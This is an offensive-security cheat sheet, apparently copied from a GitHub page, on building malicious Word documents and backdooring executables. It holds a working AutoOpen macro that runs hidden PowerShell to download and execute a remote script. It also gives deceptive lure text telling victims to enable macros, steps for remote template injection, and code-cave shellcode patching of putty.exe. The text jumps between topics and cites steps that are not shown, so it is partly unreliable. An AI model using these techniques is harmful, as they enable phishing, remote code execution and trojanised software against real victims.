You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
To prepare the document for delivery, go to File > Info > Inspect Document > Inspect Document, which will bring up the Document Inspector. Click Inspect and then Remove All next to Document Properties and Personal Information. This is to prevent the username on your system being embedded in the document.
Entice user to enable Macro's. Message example: "Security Product XYZ has scanned the content and deemed it to be safe. To reveal the content, click Enable Content"
Simple macro
Save it as .doc. Macro in a .docx is not possible and the .docm has a huge! and might get blocked by email gateways.
Sub AutoOpen()
Dim Shell As Object
Set Shell = CreateObject("wscript.shell")
Shell.Run "powershell.exe -nop -w hidden -c ""IEX ((new-object net.webclient).downloadstring('http://<IP>/shell.ps1'))"""
End Sub
Template injection
Remote Template Injection is a technique where an attacker sends a benign document to a victim, which downloads and loads a malicious template. This template may hold a macro, leading to code execution.
Manual way
Create a word document with prefered macro. Save it as .dot Word 97-2003 Template (*.dot) file.`
Host the template on a webserver for example http://<IP>/template.dot
Create a new document with the template and save it as .docx.
Browse to the directory in Windows explorer, right-click and select 7-Zip > Open archive. Navigate to word > _rels, right-click on settings.xml.rels and select Edit.
Change the target entry from the one pointing to the local file to the hosted template on the webserver. Target="http://<IP>/template.dot"
Select the first first instruction and press space. (or right click and select assemble)
Change the instruction to jump 0x and then past the cave address. Example: jmp 0x0045C961
Placing shellcode in the nullbyte area will change the stack and pointers etc. Save all the value of the registers and flags to the stack. Set the following instructions in the first nullbytes:
pushad
pushfd
Select the rest of the nullbyte area and copy the following calc32 hex shellcode, right click the nullbyte area and go to Binary --> Edit. Paste it with the curson at the first 00
Save the changes with ctrl p, click "Select All" and "Patch File". Save it as as a different file and run it. Calc.exe will execute!
But putty.exe won't run and the process will stop, even though calc.exe spawns. Set a breakpoint at every call by pressing F2 on every line with call.
Run though the code till calc.exe spawns and add a comment to the last call which spawned calc.exe. Then continue till it exits and change the last call that exited.
Select a adress in the nullbyte area. For example 0045CA27. Change the push before the last call by pressing space to jmp 0x0045CA27
Restore the state of the registers and flags. Set the following instructions at the adress of 0045CA27 and below
popfd
popad
Restore the first two instructions of step 5. Copy the bytes below and select the next empty nullbyte area, click "Binary" -> "Edit" and paste it.
6A 60 68 B0 7A 47 00
Make a jump to the next instruction from step 5. Copy the address (00454AD7) and change the next nullybyte to jmp 0x00454AD7